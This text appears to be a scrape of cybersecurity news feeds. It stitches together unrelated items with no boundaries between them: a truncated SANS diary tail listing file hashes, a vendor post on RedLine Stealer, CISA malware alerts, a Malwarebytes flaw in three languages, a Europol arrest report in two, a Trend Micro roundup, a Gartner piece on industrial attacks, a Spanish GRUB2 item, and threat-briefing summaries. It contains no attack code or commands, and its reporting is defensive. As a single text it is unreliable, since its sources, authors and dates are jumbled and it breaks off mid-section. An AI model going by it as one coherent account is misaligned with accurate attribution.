MD5 - be208287362492a1a3703483fefa4d3b
SHA1 - 3f834a4369f828aea46e44134afadbba8875ba05

heheheheh.vbs
MD5 - eacb8465cc5d6671618ea2b23986a45a
SHA1 - 6d2e4dbfda127cda2478e68a5426f9646bba10c5

 

[1] https://blog.nviso.eu/2017/06/07/malicious-powerpoint-documents-abusing-mouse-over-actions/
[2] https://fileinfo.com/extension/ppam
[3] https://blog.didierstevens.com/programs/oledump-py/ 
[4] https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant
[5] https://github.com/m2team/NSudo
[6] https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Authors: Gorang Joshi & Chandan S – A credential-based attack occurs when an attacker steals credentials, extends privileges, and compromises critical data. Credential theft is the first stage of a lateral movement attack and stopping the attack early in the process can make a material impact on the success and damages incurred by an attacker.

RedLine Stealer malware was found to be used by attackers extensively to harvest saved credentials from applications such as browsers and windows credential manager. Several fake installers of renowned software have been reported for dropping the Redline Stealer malware. Using this tool, it is remarkably easy to retrieve and save credentials from any application. This malware when dropped, scans the affected endpoint for Crypto Wallets, Browser Login Credentials, Cookies, VPN client credentials and Instant Messaging Applications. A credential theft allows attackers access to a slew of other resources on the network. And much of these can be accessed by attackers without getting detected.

The Attivo ThreatStrike Credentials Protection hides and denies unauthorized access to applications credential store. For example, only Chrome will have access to its credential store, and all other applications won’t. The product protects more than 80 of the most popular Windows applications that attackers target, with a plan to add more applications.

With RedLine Stealer gaining attention lately, Attivo research team tested the tool to see the level of Trust Issues attackers would face using such tools.

In the following section we first show how an attacker can easily grab such data using RedLine Stealer and then compare that with what happens when the same tool is run on a machine which is protected with Attivo Credentials Protection.

Figure 1: Credentials Stolen without Attivo’s ThreatStrike Credential Protection

Figure 2: Credential Theft Prevented With Attivo’s ThreatStrike Credential Protection

ThreatStrike Credential Protection from Attivo not only prevents malware from accessing production credentials, but also alerts users if such behavior is seen. The illustration below captures how alerts show up in the Events dashboard.

Figure 3: Event Level view of the Incident Occurred

Figure 4: Detailed Endpoint Report of the Incident Occurred

In a constantly changing threat landscape with advanced persistent threats using stealthy techniques like Credential Theft, preventing unauthorized access to saved credentials should be one of the top priorities for security teams. One must not rely on Anti-Malware or other Endpoint Protection Platforms to prevent usage of tools like RedLine Stealer. There is always a new method available to evade the Endpoint Protection technologies.

Attivo Credentials Protection prevents credentials theft by denying access to unauthorized applications. To learn more about the Attivo Networks EDN Suite’s new credential protection capability, read the press release here. For more information on the EDN Suite solution, go here.

The post Preventing Credential Theft by RedLine Stealer Malware appeared first on Attivo Networks.

flag.png

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

flag.png

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

SDfb.jpg

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

twitterbitacora.png

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

fed-up-person-laptop.jpg

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

READ NEXTIIoT smart factories are leaving doors open for cyber attacks

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. Allegedly determined to be North Korean hackers, attempts have been thwarted but could easily have led to attacks that could devastate the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of ICS computers on its watch had been attacked by malicious malware at least once in the first half of 2018. 

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of incidents on cyber-physical security (CPS) are fortunately rare but set to rapidly increase in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong. 

Industrial robots are welding metal part in factory

Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”

YOU MIGHT LIKE

IOT

IIoT smart factories are leaving doors open for cyber attacks

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Colbalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 916000.png

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

Android banking trojan, Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.Recommendation: Users should be cautious when downloading Android applications, with malicious apps occasionally bypassing Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies have been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola, Nintendo, among many others. Within the source code the developers’ names, along with hardcoded credentials have been found.Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, a misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity, and cause significant harm to a company’s reputation.Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records which included addresses birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell the breach on a hacker forum, however, they ended up releasing the database for free on another site.Recommendation: Dave is requiring all users to do a password reset, however, users need to be aware they are still at risk if they are using the same password for other sites as well.Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigations (FBI) and FireEye both have confirmed a series of campaigns by the Russian GRU associated APT28, aka Fancy Bear. These attacks began in December of 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spaying and brute force. The long term motivation behind these attacks is not clear, but are likely a variation of the past motives of APT28, including US election meddling, and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling as APT28 is believed to have been behind previous attacks against US and Ukrainian Energy infrastructure and Industry Control Systems (ICS).Recommendation: Defense in-depth, along with well designed and regular employee training is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store, this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used, arguably the servers have almost full control of a users phone exhibiting similarities to a malware C&C server. The app also uses auto-debugging and encryption techniques to stop security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and argued that the US DHS had found no evidence of suspicious data transmission.Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be, “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime,

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to North Korea based Lazarus APT group. The framework has been used by the threat actors since April 2018 and targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims like distributing VHD ransomware and querying victim databases for acquiring customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing as an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014 continuously using variants of MgBot throughout.Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks utilizing the tools from e-crime group Golden Chickens who provide Malware-as-a-Service (MaaS) throughout March and April. Researchers attributed each attack with confidence varying from low to moderate to groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and brute force implementation. Golden Chickens MaaS remains as a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.Recommendation: Financially themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191Tags: Terra loader, Golden chickens

More malware designed for air-gapped systems. A British utility sustains a ransomware attack. The US Cyberspace Solarium Commission sees lessons in the pandemic for cybersecurity. Contact-tracing technologies take a step back,maybe a step or two forward. Rob Lee from Dragos comparing the state of ICS security around the world, our guest is Ian Pitt from LogMeIn on lessons learned working remotely during COVID-19. Criminals increase ransomware attacks on hospitals, and swap templates to impersonate government relief agencies.

For links to all of today’s stories check out our CyberWire daily news brief:

https://thecyberwire.com/newsletters/daily-briefing/9/95

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Bugs, Exploit, Healthcare Attacks, Naikon, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 793547.pngFigure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

